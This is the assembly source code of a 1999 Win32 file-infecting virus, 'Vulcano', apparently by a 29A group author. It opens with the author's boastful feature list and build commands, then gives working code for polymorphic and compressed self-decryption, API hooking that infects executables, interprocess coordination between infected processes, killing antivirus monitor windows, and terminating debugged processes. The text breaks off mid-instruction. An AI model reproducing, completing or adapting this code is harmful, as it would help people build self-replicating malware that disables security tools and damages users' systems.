; ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ; ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ; Win32.Vulcano ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ ; by Benny/29A ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ ; ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ ; ; ; ;Description ;ÄÄÄÄÄÄÄÄÄÄÄÄ ; ; ;Hello everybody, ; ;I was wrong. Not BeGemot, but Vulcano is my best virus :D. It has lot of nice ;and never published features and it is ofcoz, very optimized. I hope u will ;like, coz this took me much time to code and even more time to test it. Here ;comes a little description of that. Heh, this is my best virus and it has very ;small description - I don't know how to better present it than just write ;a list of its features. Enjoy it! ; ;This virus is: ; - the first multiprocess Win32 (Win95/98/NT/2k compatible) ; virus with interprocess communication(!!!) ; - per-process resident multithreaded fast mid-infector ; - polymorphic using two layers - advanced BPE32 and ; second semi-morpher ; - compressed using BCE32 ; - heavilly armoured ; - CRC32 protected ; - undetectable by any antivirus ; ;This virus uses: ; - Structured Exception Handling ; - EPO routines (virus patches one imported API) ; - CRC32 records instead of raw ANSI strings ; - Anti-* routines ; - Pentium and undocumented instructions (also in poly decryptor) ; ;This virus doesn't: ; - infect system files ; - infect files which doesn't contain .reloc section ; - infect small files ; - enlarge file ; - contain any payload ; ;This virus is able to: ; - deactivate some AV monitors ; - infect EXE/SCR/SFX/CPL/DAT/BAK files ; - overwrite relocations ; - communicate with other instances of virus ; ;And much more. In short words, this virus presents many new hot features never ;been published. ; ; ; ;Interprocess communication (IPC) ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; ; ;This is the best part of the virus :). The main idea is: make all actions ;in another process. Imagine, virus does nothing. Nothing in actual process. ;But if another infected program is running in system, virus will pass control ;to that instance of virus. This very difficult stuff is realised by file mapping ;mirrored in swap file, mutexes and threads. That code is very optimized, but ;unfortunetely, it contains some bugs, which fortunately aren't much visible. ;In 99,9999% of all cases u won't see anything suspicious. That's truth. ; ; ; ;What will happen on execution ? ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ- ; ; ;Virus will (after patched API will be called): ;1) Decrypt it's body by polymorphic decryptor ;2) Decompress virus body ;3) Decrypt virus body by 2nd decryptor ;4) Check consistency of virus body by CRC32 - this prevents from setting ; breakpoints ;5) Check for Pentium processor ;6) Find base of Kernel32.dll in memory ;7) Find all needed APIs (using CRC32) ;8) Create new thread which will hook some API functions ;9) Wait for thread termination ;10) Create/Open the space in swap file and initialize (create new) record ; for IPC ;11) Create new thread for IPC ;12) Jump to host ; ; ;After hooked API call (API manipulating with files) will virus: ;1) Get file name ;2) Check file properties via IPC ;3) Open file, check it and infect it via IPC ;4) Call original API (depending on API) ; ; ;After hooked API call (ExitProcess, GetLastError, ...) will virus: ;1) Check for application level debugger via IPC (if found, process will be ; remotely terminated - veeery nice feature :)) ;2) Check for system level debugger (SoftICE) via IPC ;3) Check for monitors in memory via IPC ;4) Find random file ;5) Check it via IPC ;6) Check and infect it via IPC ; ; ;IPC thread in memory will: ;1) Check for new request ;2) Do property action ;3) Pass execution to next thread ; ; ; ;Greetz ;ÄÄÄÄÄÄÄ ; ; ; Darkman/29A.... Finally I finished it! Hope u like it... ; Billy_Bel...... Where r u? Please mail me... ; GriYo.......... U genius! ; flush.......... no, neni to sice tak super jako to vase, ale da se to ; snest, doufam :) ; StarZer0....... Who is Axelle? X-D ; ; ; ;How to build it ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; ; ; tasm32 -ml -m9 -q vulcano.asm ; tlink32 -Tpe -c -x -aa -r vulcano,,, import32 ; pewrsec vulcano.exe ; ; ; ;Last notes ;ÄÄÄÄÄÄÄÄÄÄÄ ; ;Yeah, I'm really happy, coz I finished that. It was very hard to code it and ;much harder to debug it. I know it has some small bugs, but I hope u will like ;it over the all negative aspects as buggy code is. Please, tell me what do u ;think about it on IRC, or by mail. I can provide u binary form and if u want ;to have it, then there's nothing easier than contact me on benny@post.cz. ;The hardest thing to code was synchronization module. In first versions of ;Vulcano I used normal variable as semaphores, but the code was very slow and ;buggy. Then I recompiled it with mutexes and it worked much better. However, ;there is still code, which I can't and don't want to change. ;Last thing: this virus wasn't coded for spreading, but just and ONLY for ;education purposes only. It infects only huge files with relocation table ;and I hope it is kewl virus without all those spread-features. ; ; ; ;(c) 1999 Benny/29A. Enjoy! .586p ;why not ;) .model flat ;FLAT model include mz.inc ;include some important include pe.inc ;include-filez include win32api.inc include useful.inc ;some instructions push_LARGE_0 equ ;PUSH LARGE 0 SALC equ ;SALC opcode RDTCS equ ;RDTCS ;some equates for VLCB (VLCB = VuLcano Control Block) VLCB_Signature equ 00 ;signature VLCB_TSep equ 08 ;record separator VLCB_THandle equ 00 ;mutex handle VLCB_TID equ 04 ;ID of service VLCB_TData equ 08 ;data VLCB_TSize equ SIZEOF_WIN32_FIND_DATA+8;size of one record VLCB_SetWait equ 00 ;set data and wait for result VLCB_WaitGet equ 01 ;wait for signalisation and get data VLCB_Quit equ 01 ;quit VLCB_Check equ 02 ;check file VLCB_Infect equ 03 ;infect file VLCB_Debug1 equ 04 ;check for app level debugger VLCB_Debug2 equ 05 ;check for SoftICE VLCB_Monitor equ 06 ;check for AVP and AMON monitors j_api macro API ;JMP DWORD PTR [XXXXXXXXh] dw 25ffh API dd ? endm c_api macro API ;CALL DWORD PTR [XXXXXXXXh] dw 15ffh API dd ? endm extrn GetModuleHandleA:PROC ;APIs needed in first extrn ExitProcess:PROC ;generation only .data ;data section VulcanoInit: ;Start of virus SALC ;undoc. opcode to fuck emulators push dword ptr [offset _GetModuleHandleA] ;push original API ddAPI = dword ptr $-4 push 400000h ;push image base ImgBase = dword ptr $-4 pushad ;store all registers call gd ;get delta offset gd: pop ebp ;... lea esi, [ebp + _compressed_ - gd] ;where is compressed virus ;stored lea edi, [ebp + decompressed - gd] ;where will be virus ;decompressed mov ecx, 0 ;size of compressed virus c_size = dword ptr $-4 ;Decompression routine from BCE32 starts here. pushad ;save all regs xor eax, eax ;EAX = 0 xor ebp, ebp ;EBP = 0 cdq ;EDX = 0 lodsb ;load decryption key push eax ;store it lodsb ;load first byte push 8 ;store 8 push edx ;store 0 d_bits: push ecx ;store ECX test al, 80h ;test for 1 jne db0 test al, 0c0h ;test for 00 je db1 test al, 0a0h ;test for 010 je db2 mov cl, 6 ;its 011 jmp tb2 testb: test bl, 1 ;is it 1 ? jne p1 push 0 ;no, store 0 _tb_: mov eax, ebp ;load byte to EAX or al, [esp] ;set bit ror al, 1 ;and make space for next one call cbit ret p1: push 1 ;store 1 jmp _tb_ ;and continue db0: xor cl, cl ;CL = 0 mov byte ptr [esp+4], 1 ;store 1 testbits: push eax ;store it push ebx ;... mov ebx, [esp+20] ;load parameter ror bl, cl ;shift to next bit group call testb ;test bit ror bl, 1 ;next bit call testb ;test it pop ebx ;restore regs pop eax mov ecx, [esp+4] ;load parameter bcopy: cmp byte ptr [esp+8], 8 ;8. bit ? jne dnlb ;nope, continue mov ebx, eax ;load next byte lodsb xchg eax, ebx mov byte ptr [esp+8], 0 ;and nulify parameter dec dword ptr [esp] ;decrement parameter dnlb: shl al, 1 ;next bit test bl, 80h ;is it 1 ? je nb ;no, continue or al, 1 ;yeah, set bit nb: rol bl, 1 ;next bit inc byte ptr [esp+8] ;increment parameter loop bcopy ;and align next bits pop ecx ;restore ECX inc ecx ;test flags dec ecx ;... jns d_bits ;if not sign, jump pop eax ;delete pushed parameters pop eax ;... pop eax ;... popad ;restore all regs jmp decompressed cbit: inc edx ;increment counter cmp dl, 8 ;byte full ? jne n_byte ;no, continue stosb ;yeah, store byte xor eax, eax ;and prepare next one cdq ;... n_byte: mov ebp, eax ;save back byte ret Pshd ;quit from procedure with one parameter on stack db1: mov cl, 2 ;2. bit in decryption key mov byte ptr [esp+4], 2 ;2 bit wide jmp testbits ;test bits db2: mov cl, 4 ;4. bit tb2: mov byte ptr [esp+4], 3 ;3 bit wide jmp testbits ;test bits _compressed_ db virus_end-compressed+200h dup (?) ;here is stored compressed ;virus body decompressed: db virus_end-compressed dup (?) ;here decompressed db size_unint dup (?) ;and here all uninitialized ;variables virtual_end: ;end of virus in memory ends .code ;start of code section first_gen: ;first generation code ;second layer of encryption mov esi, offset encrypted ;encrypt from... mov ecx, (virus_end-encrypted+3)/4 ;encrypt how many bytes... encrypt1: lodsd ;get dword xor eax, 1 ;encrypt mov [esi-4], eax ;and store it loop encrypt1 ; mov esi, offset compressed ;source mov edi, offset _compressed_ ;destination mov ecx, virus_end-compressed+2 ;size mov ebx, offset workspace1 ;workspace1 mov edx, offset workspace2 ;workspace2 call BCE32_Compress ;Compress virus body! dec eax mov [c_size], eax ;save compressed virus size push 0 ;parameter for GetModuleHandleA call VulcanoInit ;call virus code push 0 ;parameter for ExitProcess call ExitProcess ;this will be hooked by virus l8r ;Compression routine from BCE32 starts here. This is used only in first gen. BCE32_Compress Proc pushad ;save all regs ;stage 1 pushad ;and again create_table: push ecx ;save for l8r usage push 4 pop ecx ;ECX = 4 lodsb ;load byte to AL l_table:push eax ;save it xor edx, edx ;EDX = 0 and al, 3 ;this stuff will separate and test je st_end ;bit groups cmp al, 2 je st2 cmp al, 3 je st3 st1: inc edx ;01 jmp st_end st2: inc edx ;10 inc edx jmp st_end st3: mov dl, 3 ;11 st_end: inc dword ptr [ebx+4*edx] ;increment count in table pop eax ror al, 2 ;next bit group loop l_table pop ecx ;restore number of bytes loop create_table ;next byte push 4 ;this will check for same numbers pop ecx ;ECX = 4 re_t: cdq ;EDX = 0 t_loop: mov eax, [ebx+4*edx] ;load DWORD inc dword ptr [ebx+4*edx] ;increment it cmp eax, [ebx] ;test for same numbers je _inc_ ;... cmp eax, [ebx+4] ;... je _inc_ ;... cmp eax, [ebx+8] ;... je _inc_ ;... cmp eax, [ebx+12] ;... jne ninc_ ;... _inc_: inc dword ptr [ebx+4*edx] ;same, increment it inc ecx ;increment counter (check it in next turn) ninc_: cmp dl, 3 ;table overflow ? je re_t ;yeah, once again inc edx ;increment offset to table loop t_loop ;loop popad ;restore regs ;stage 2 pushad ;save all regs mov esi, ebx ;get pointer to table push 3 pop ebx ;EBX = 3 mov ecx, ebx ;ECX = 3 rep_sort: ;bubble sort = the biggest value will ;always "bubble up", so we know number ;steps push ecx ;save it mov ecx, ebx ;set pointerz mov edi, edx ;... push edx ;save it lodsd ;load DWORD (count) mov edx, eax ;save it sort: lodsd ;load next cmp eax, edx ;is it bigger jb noswap ;no, store it xchg eax, edx ;yeah, swap DWORDs noswap: stosd ;store it loop sort ;next DWORD mov eax, edx ;biggest in EDX, swap it stosd ;and store lea esi, [edi-16] ;get back pointer pop edx ;restore regs pop ecx loop rep_sort ;and try next DWORD popad ;stage 3 pushad ;save all regs xor eax, eax ;EAX = 0 push eax ;save it push 4 pop ecx ;ECX = 4 n_search: push edx ;save regs push ecx lea esi, [ebx+4*eax] ;get pointer to table push eax ;store reg lodsd ;load DWORD to EAX push 3 pop ecx ;ECX = 3 mov edi, ecx ;set pointerz search: mov esi, edx push eax ;save it lodsd ;load next mov ebp, eax pop eax cmp eax, ebp ;end ? je end_search dec edi ;next search add edx, 4 loop search end_search: pop eax ;and next step inc eax pop ecx pop edx add [esp], edi rol byte ptr [esp], 2 loop n_search pop [esp.Pushad_ebx] ;restore all popad ;... ;stage 4 xor ebp, ebp ;EBP = 0 xor edx, edx ;EDX = 0 mov [edi], bl ;store decryption key inc edi ;increment pointer next_byte: xor eax, eax ;EAX = 0 push ecx lodsb ;load next byte push 4 pop ecx ;ECX = 4 next_bits: push ecx ;store regs push eax and al, 3 ;separate bit group push ebx ;compare with next group and bl, 3 cmp al, bl pop ebx je cb0 push ebx ;compare with next group ror bl, 2 and bl, 3 cmp al, bl pop ebx je cb1 push ebx ;compare with next group ror bl, 4 and bl, 3 cmp al, bl pop ebx je cb2 push 0 ;store bit 0 call copy_bit push 1 ;store bit 1 call copy_bit cb0: push 1 ;store bit 1 end_cb1:call copy_bit pop eax pop ecx ror al, 2 loop next_bits ;next bit pop ecx loop next_byte ;next byte mov eax, edi ;save new size sub eax, [esp.Pushad_edi] ;... mov [esp.Pushad_eax], eax ;... popad ;restore all regs cmp eax, ecx ;test for negative compression jb c_ok ;positive compression stc ;clear flag ret ;and quit c_ok: clc ;negative compression, set flag ret ;and quit cb1: push 0 ;store bit 0 end_cb2:call copy_bit push 0 ;store bit 0 jmp end_cb1 cb2: push 0 ;store bit 0 call copy_bit push 1 ;store bit 1 jmp end_cb2 copy_bit: mov eax, ebp ;get byte from EBP shl al, 1 ;make space for next bit or al, [esp+4] ;set bit jmp cbit BCE32_Compress EndP ;end of compression procedure compressed: ;compressed body starts here @SEH_SetupFrame ;setup SEH frame call gdlta ;calculate delta offset gdelta: dd ddFindFirstFileA-gdelta ;addresses dd ddFindNextFileA-gdelta ;of variables dd ddFindClose-gdelta ;where will dd ddSetFileAttributesA-gdelta ;be stored dd ddSetFileTime-gdelta ;addresses of APIs dd ddCreateFileA-gdelta dd ddCreateFileMappingA-gdelta dd ddMapViewOfFile-gdelta dd ddUnmapViewOfFile-gdelta dd ddCreateThread-gdelta dd ddWaitForSingleObject-gdelta dd ddCloseHandle-gdelta dd ddCreateMutexA-gdelta dd ddReleaseMutex-gdelta dd ddOpenMutexA-gdelta dd ddSleep-gdelta dd ddVirtualProtect-gdelta dd ddGetCurrentProcessId-gdelta dd ddOpenProcess-gdelta dd ddTerminateProcess-gdelta dd ddLoadLibraryA-gdelta dd ddGetProcAddress-gdelta dd ddFreeLibrary-gdelta dd ? ;end of record newHookers: dd newFindFirstFileA-gdelta ;addresses of API hookers dd newFindNextFileA-gdelta dd newCopyFileA-gdelta dd newCopyFileExA-gdelta dd newCreateFileA-gdelta dd newCreateProcessA-gdelta dd newDeleteFileA-gdelta dd newGetFileAttributesA-gdelta dd newGetFullPathNameA-gdelta dd new_lopen-gdelta dd newMoveFileA-gdelta dd newMoveFileExA-gdelta dd newOpenFile-gdelta dd newSetFileAttributesA-gdelta dd newWinExec-gdelta dd newExitProcess-gdelta dd newExitThread-gdelta dd newGetLastError-gdelta dd newCloseHandle-gdelta dd ? ;end of record oldHookers: dd oldFindFirstFileA-gdelta ;addresses, where will be dd oldFindNextFileA-gdelta ;stored original dd oldCopyFileA-gdelta ;API callers dd oldCopyFileExA-gdelta dd oldCreateFileA-gdelta dd oldCreateProcessA-gdelta dd oldDeleteFileA-gdelta dd oldGetFileAttributesA-gdelta dd oldGetFullPathNameA-gdelta dd old_lopen-gdelta dd oldMoveFileA-gdelta dd oldMoveFileExA-gdelta dd oldOpenFile-gdelta dd oldSetFileAttributesA-gdelta dd oldWinExec-gdelta dd oldExitProcess-gdelta dd oldExitThread-gdelta dd oldGetLastError-gdelta dd oldCloseHandle-gdelta gdlta: pop ebp ;get delta offset lea esi, [ebp + encrypted - gdelta] ;get start of encrypted code mov ecx, (virus_end-encrypted+3)/4 ;number of dwords to encrypt push es ;save selector push ds pop es ;ES=DS decrypt:lodsd ;load dword xor eax, 1 ;decrypt it mov es:[esi-4], eax ;save dword with AntiAV (usage of loop decrypt ;selectors) encrypted: ;encrypted code starts here pop es ;restore selector lea esi, [ebp + crc32prot - gdelta] ;start of CRC32 protected code mov edi, virus_end-crc32prot ;size of that call CRC32 ;calculate CRC32 cmp eax, 05BB5B647h ;check for consistency crc32prot: jne jmp_host ;jump to host if breakpoints set and such ;Pentium+ check pushad pushfd ;save EFLAGS pop eax ;get them mov ecx, eax ;save them or eax, 200000h ;flip ID bit in EFLAGS push eax ;store popfd ;flags pushfd ;get them back pop eax ;... xor eax, ecx ;same? je end_cc ;shit, we r on 486- xor eax, eax ;EAX=0 inc eax ;EAX=1 cpuid ;CPUID and eax, 111100000000b ;mask processor family cmp ah, 4 ;is it 486? je end_cc ;baaaaaaad popad mov eax, ds ;this will fuck push eax ;some old versions pop ds ;of NodICE mov ebx, ds xor eax, ebx jne jmp_host mov eax, 77F00000h ;WinNT 4.0 k32 image base call get_base jecxz k32_found ;we got image base mov eax, 77E00000h ;Win2k k32 image base call get_base jecxz k32_found ;we got image base mov eax, 77ED0000h ;Win2k k32 image base call get_base jecxz k32_found ;we got image base mov eax, 0BFF70000h ;Win95/98 k32 image base call get_base test ecx, ecx jne jmp_host ;base of k32 not found, quit push cs lea ebx, [ebp + k32_found - gdelta] ;continue on another label push ebx retf ;fuck u emulator! :) end_cc: popad ;restore all registers jmp jmp_host ;and jump to host db 'Win32.Vulcano by Benny/29A' ;little signature :) k32_found: mov ebx, [esp.cPushad+8] ;get image base of app mov [ebp + GMHA - gdelta], ebx ;save it add ebx, [ebx.MZ_lfanew] ;get to PE header lea esi, [ebp + crcAPIs - gdelta] ;start of CRC32 API table mov edx, ebp ;get table of pointers s_ET: mov edi, [edx] ;get item test edi, edi ;is it 0? je end_ET ;yeah, work is done add edi, ebp ;normalize push eax ;save EAX call SearchET ;search for API stosd ;save its address test eax, eax ;was it 0? pop eax ;restore EAX je jmp_host ;yeah, error, quit add esi, 4 ;correct pointers add edx, 4 ;to pointers... jmp s_ET ;loop get_base: pushad ;save all registers @SEH_SetupFrame ;setup SEH frame xor ecx, ecx ;set error value inc ecx cmp word ptr [eax], IMAGE_DOS_SIGNATURE ;is it EXE? jne err_gbase ;no, quit dec ecx ;yeah, set flag err_gbase: ;and quit @SEH_RemoveFrame ;remove SEH frame mov [esp.Pushad_ecx], ecx ;save flag popad ;restore all registers ret ;and quit from procedure end_ET: lea eax, [ebp + tmp - gdelta] ;now we will create new push eax ;thread to hide writing to xor eax, eax ;Import table push eax push ebp ;delta offset lea edx, [ebp + NewThread - gdelta] ;address of thread procedure push edx push eax ;and other shit to stack push eax mov eax, 0 ddCreateThread = dword ptr $-4 call eax ;create thread! test eax, eax ;is EAX=0? je jmp_host ;yeah, quit push eax ;parameter for CloseHandle push -1 ;infinite loop push eax ;handle of thread call [ebp + ddWaitForSingleObject - gdelta] ;wait for thread termination call [ebp + ddCloseHandle - gdelta] ;close thread handle ;now we will create space in shared memory for VLCB structure call @VLCB db 'VLCB',0 ;name of shared area @VLCB: push 2000h ;size of area push 0 push PAGE_READWRITE push 0 push -1 ;SWAP FILE! call [ebp + ddCreateFileMappingA - gdelta] ;open area test eax, eax je jmp_host ;quit if error xor edx, edx push edx push edx push edx push FILE_MAP_WRITE push eax call [ebp + ddMapViewOfFile - gdelta] ;map view of file to address xchg eax, edi ;space of virus test edi, edi je end_gd1 ;quit if error mov [ebp + vlcbBase - gdelta], edi ;save base address ;now we will create named mutex call @@@1 ;push address of name @@1: dd 0 ;random name @@@1: RDTCS ;get random number mov edx, [esp] ;get address of name shr eax, 8 ;terminate string with \0 mov [edx], eax ;and save it mov esi, [esp] ;get address of generated name push 0 push 0 mov eax, 0 ddCreateMutexA = dword ptr $-4 call eax ;create mutex test eax, eax je end_gd2 ;quit if error ;now we will initialize VLCB structure xor edx, edx ;EDX=0 mov eax, edi ;get base of VLCB mov [eax.VLCB_Signature], 'BCLV' ;save signature ;now we will initialize record for thread mov ecx, 20 ;20 communication channels sr_t: cmp dword ptr [edi.VLCB_TSep.VLCB_THandle], 0 ;check handle jne tnext ;if already reserved, then try next mov esi, [esi] ;get name of mutex mov [edi.VLCB_TSep.VLCB_THandle], esi ;save it mov [ebp + t_number - gdelta], edx ;and save ID number of mutex lea eax, [ebp + tmp - gdelta] ;create new thread push eax ;for IPC xor eax, eax push eax push ebp lea edx, [ebp + mThread - gdelta] ;address of thread procedure push edx push eax push eax call [ebp + ddCreateThread - gdelta] ;create new thread xchg eax, ecx jecxz end_gd3 ;quit if error jmp_host: @SEH_RemoveFrame ;remove SEH frame mov eax, [esp.cPushad+4] ;save address of previous mov [esp.Pushad_eax], eax ;API caller popad ;restore all regs add esp, 8 ;repair stack pointer push cs ;save selector push eax ;save offset of API caller retf ;jump to host :) tnext: add edi, VLCB_TSize ;get to next record inc edx ;increment counter loop sr_t ;try again jmp jmp_host ;quit if more than 20 viruses r in memory end_gd3:push esi call [ebp + ddCloseHandle - gdelta] ;close mutex end_gd2:push dword ptr [ebp + vlcbBase - gdelta] call [ebp + ddUnmapViewOfFile - gdelta] ;unmap VLCB end_gd1:push edi call [ebp + ddCloseHandle - gdelta] ;close mapping of file jmp jmp_host ;and jump to host gtDelta:call mgdlta ;procedure used to getting mgdelta:db 0b8h ;fuck u disassemblers mgdlta: pop ebp ;get it ret ;and quit newFindFirstFileA: ;hooker for FindFirstFileA API push dword ptr [esp+8] ;push parameters push dword ptr [esp+8] ;... c_api oldFindFirstFileA ;call original API p_file: pushad ;store all registers call gtDelta ;get delta mov ebx, [esp.cPushad+8] ;get Win32 Find Data call Check&Infect ;try to infect file popad ;restore all registers ret 8 ;and quit newFindNextFileA: push dword ptr [esp+8] ;push parameters push dword ptr [esp+8] ;... c_api oldFindNextFileA ;call previous API jmp p_file ;and continue process_file: pushad ;store all registers call gtDelta ;get delta offset lea esi, [ebp + WFD2 - mgdelta] ;get Win32_Find_Data push esi ;save it push dword ptr [esp.cPushad+0ch] ;push offset to filename call [ebp + ddFindFirstFileA - mgdelta] ;find that file inc eax je end_pf ;quit if error dec eax xchg eax, ecx ;handle to ECX mov ebx, esi ;WFD to EBX call Check&Infect ;check and infect it push ecx call [ebp + ddFindClose - mgdelta] ;close find handle end_pf: popad ;restore all registers ret ;and quit ;generic hookers for some APIs newCopyFileExA: call process_file j_api oldCopyFileExA newCopyFileA: call process_file j_api oldCopyFileA newCreateFileA: call process_file j_api oldCreateFileA newCreateProcessA: call process_file j_api oldCreateProcessA newDeleteFileA: call process_file j_api oldDeleteFileA newGetFileAttributesA: call process_file j_api oldGetFileAttributesA newGetFullPathNameA: call process_file j_api oldGetFullPathNameA new_lopen: call process_file j_api old_lopen newMoveFileA: call process_file j_api oldMoveFileA newMoveFileExA: call process_file j_api oldMoveFileExA newOpenFile: call process_file j_api oldOpenFile newSetFileAttributesA: call process_file j_api oldSetFileAttributesA newWinExec: call process_file j_api oldWinExec open_driver: xor eax, eax ;EAX=0 push eax ;parameters push 4000000h ;for push eax ;CreateFileA push eax ;API push eax ;function push eax ;... push ebx call [ebp + ddCreateFileA - mgdelta] ;open driver ret close_driver: push eax ;close its handle call [ebp + ddCloseHandle - mgdelta] ret common_stage: ;infect files in curr. directory pushad call gtDelta ;get delta offset mov ecx, fs:[20h] ;get context debug jecxz n_debug ;if zero, debug is not present k_debug:mov eax, 0 ddGetCurrentProcessId = dword ptr $-4 call eax ;get ID number of current process call vlcb_stuph ;common stuph lea esi, [ebp + data_buffer - mgdelta] mov dword ptr [esi.WFD_szAlternateFileName], ebp ;set random data mov ebx, VLCB_Debug1 ;kill debugger call get_set_VLCB ;IPC! vlcb_stuph: xor edx, edx ;random thread dec edx mov ecx, VLCB_SetWait ;set and wait for result ret n_debug:call vlcb_stuph ;common stuph lea esi, [ebp + data_buffer - mgdelta] mov dword ptr [esi.WFD_szAlternateFileName], ebp ;set random data mov ebx, VLCB_Debug2 ;check for SoftICE call get_set_VLCB ;IPC! mov eax, dword ptr [esi.WFD_szAlternateFileName] ;get result dec eax test eax, eax je endEP ;quit if SoftICE in memory call vlcb_stuph ;common stuph lea esi, [ebp + data_buffer - mgdelta] mov dword ptr [esi.WFD_szAlternateFileName], ebp ;set random data mov ebx, VLCB_Monitor ;kill monitors call get_set_VLCB ;IPC! lea ebx, [ebp + WFD - mgdelta] ;get Win32 Find Data push ebx ;store its address call star db '*.*',0 ;create mask star: mov eax, 0 ddFindFirstFileA = dword ptr $-4 call eax ;find file inc eax je endEP ;if error, then quit dec eax mov [ebp + fHandle - mgdelta], eax ;store handle call Check&Infect ;and try to infect file findF: lea ebx, [ebp + WFD - mgdelta] ;get Win32 Find Data push ebx ;store address push_LARGE_0 ;store handle fHandle = dword ptr $-4 mov eax, 0 ddFindNextFileA = dword ptr $-4 call eax ;find next file xchg eax, ecx ;result to ECX jecxz endEP2 ;no more files, quit call Check&Infect ;try to infect file jmp findF ;find another file endEP2: push dword ptr [ebp + fHandle - mgdelta];store handle mov eax, 0 ddFindClose = dword ptr $-4 call eax ;close it endEP: popad ret newExitProcess: ;hooker for ExitProcess API pushad call common_stage ;infect files in current directory call gtDelta ;get delta offset mov edx, [ebp + t_number - mgdelta] ;get ID number of thread push edx mov ecx, VLCB_SetWait ;set and wait for result lea esi, [ebp + data_buffer - mgdelta] mov dword ptr [esi.WFD_szAlternateFileName], ebp mov ebx, VLCB_Quit ;terminate thread call get_set_VLCB ;IPC! pop edx ;number of thread imul edx, VLCB_TSize ;now we will push VLCB_TSize/4 ;erase thread pop ecx ;record add edi, edx ;from VLCB add edi, VLCB_TSep xor eax, eax rep stosd ;... popad j_api oldExitProcess ;jump to original API ;next hookers newExitThread: call common_stage j_api oldExitThread newCloseHandle: call common_stage j_api oldCloseHandle newGetLastError: call common_stage j_api oldGetLastError Monitor:pushad ;store all registers call szU32 ;push address of string USER32.dll db 'USER32',0 szU32: mov eax, 0 ddLoadLibraryA = dword ptr $-4 ;Load USER32.dll call eax xchg eax, ebx test ebx, ebx je end_mon2 ;quit if error call FindWindowA ;push address of string FindWindowA db 'FindWindowA',0 FindWindowA: push ebx ;push lib handle mov eax, 0 ddGetProcAddress = dword ptr $-4 ;get address of FindWindowA API call eax xchg eax, esi test esi, esi je end_mon ;quit if error call PostMessageA ;push address of string PostMessageA db 'PostMessageA',0 PostMessageA: push ebx call [ebp + ddGetProcAddress - mgdelta] ;get address of PostMessageA xchg eax, edi test edi, edi je end_mon ;quit if error mov ecx, 3 ;number of monitors call Monitors ;push address of strings db 'AVP Monitor',0 ;AVP monitor db 'Amon Antivirus Monitor',0 ;AMON english version db 'Antivírusový monitor Amon',0 ;AMON slovak version Monitors: pop edx ;pop address k_mon: pushad ;store all registers xor ebp, ebp push edx push ebp call esi ;find window test eax, eax je next_mon ;quit if not found push ebp push ebp push 12h ;WM_QUIT push eax call edi ;destroy window next_mon: popad ;restore all registers push esi mov esi, edx @endsz ;get to next string mov edx, esi ;move it to EDX pop esi loop k_mon ;try another monitor end_mon:push ebx ;push lib handle mov eax, 0 ddFreeLibrary = dword ptr $-4 call eax ;unload library end_mon2: popad ;restore all registers jmp d_wr ;and quit Debug2: lea ebx, [ebp + sice95 - mgdelta] ;address of softice driver string call open_driver ;open driver inc eax ;is EAX==0? je n_sice ;yeah, SoftICE is not present dec eax call close_driver ;close driver jmp d_wr ;and quit n_sice: lea ebx, [ebp + siceNT - mgdelta] ;address of softice driver string call open_driver ;open driver inc eax je n2_db ;quit if not present dec eax call close_driver ;close driver jmp d_wr ;and quit Debug1: push dword ptr [esi.WFD_szAlternateFileName] ;push ID number of process push 0 push 1 mov eax, 0 ddOpenProcess = dword ptr $-4 call eax ;open process test eax, eax jne n1_db n2_db: call t_write ;quit if error jmp m_thrd n1_db: push 0 push eax mov eax, 0 ddTerminateProcess = dword ptr $-4 ;destroy debugged process :) call eax jmp t_write mThread:pushad ;main IPC thread @SEH_SetupFrame ;setup SEH frame call gtDelta ;get delta m_thrd: mov edx, 0 ;get thread ID number t_number = dword ptr $-4 mov ecx, VLCB_WaitGet lea esi, [ebp + data_buffer - mgdelta] call get_set_VLCB ;wait for request dec ecx jecxz Quit ;quit dec ecx jecxz Check ;check file cmp ecx, 1 je Infect ;check and infect file cmp ecx, 2 je Debug1 ;check for debugger cmp ecx, 3 je Debug2 ;check for SoftICE cmp ecx, 4 je Monitor ;kill AV monitors push 0 call [ebp + ddSleep - mgdelta] ;switch to next thread jmp m_thrd ;and again... Quit: call t_write ;write result end_mThread: @SEH_RemoveFrame ;remove SEH frame popad ;restore all registers ret ;and quit from thread t_write:xor ecx, ecx ;set result inc ecx t_wr: inc ecx mov dword ptr [esi.WFD_szAlternateFileName], ecx ;write it mov ecx, VLCB_SetWait ;set and wait mov edx, [ebp + t_number - mgdelta] ;this thread call get_set_VLCB ;IPC! ret Check: @SEH_SetupFrame ;setup SEH frame call CheckFile ;check file jecxz err_sCheck ;quit if error _c1_ok: @SEH_RemoveFrame ;remove SEH frame call t_write ;write result jmp m_thrd ;and quit err_sCheck: @SEH_RemoveFrame ;remove SEH frame d_wr: xor ecx, ecx call t_wr ;write result jmp m_thrd ;and quit Infect: @SEH_SetupFrame ;setup SEH frame call InfectFile ;check and infect file jmp _c1_ok ;and quit InfectFile: lea esi, [esi.WFD_szFileName] ;get filename pushad xor eax, eax push eax push FILE_ATTRIBUTE_NORMAL push OPEN_EXISTING push eax push eax push GENERIC_READ or GENERIC_WRITE push esi mov eax, 0 ddCreateFileA = dword ptr $-4 call eax ;open file inc eax je r_attr ;quit if error dec eax mov [ebp + hFile - mgdelta], eax ;save handle xor edx, edx push edx push edx push edx push PAGE_READWRITE push edx push eax mov eax, 0 ddCreateFileMappingA = dword ptr $-4 call eax ;create file mapping xchg eax, ecx jecxz endCreateMapping ;quit if error mov [ebp + hMapFile - mgdelta], ecx ;save handle xor edx, edx push edx push edx push edx push FILE_MAP_WRITE push ecx mov eax, 0 ddMapViewOfFile = dword ptr $-4 call eax ;map view of file xchg eax, ecx jecxz endMapFile ;quit if error mov [ebp + lpFile - mgdelta], ecx ;save base address jmp nOpen endMapFile: push_LARGE_0 ;store base address lpFile = dword ptr $-4 mov eax, 0 ddUnmapViewOfFile = dword ptr $-4 call eax ;unmap view of file endCreateMapping: push_LARGE_0 ;store handle hMapFile = dword ptr $-4 call [ebp + 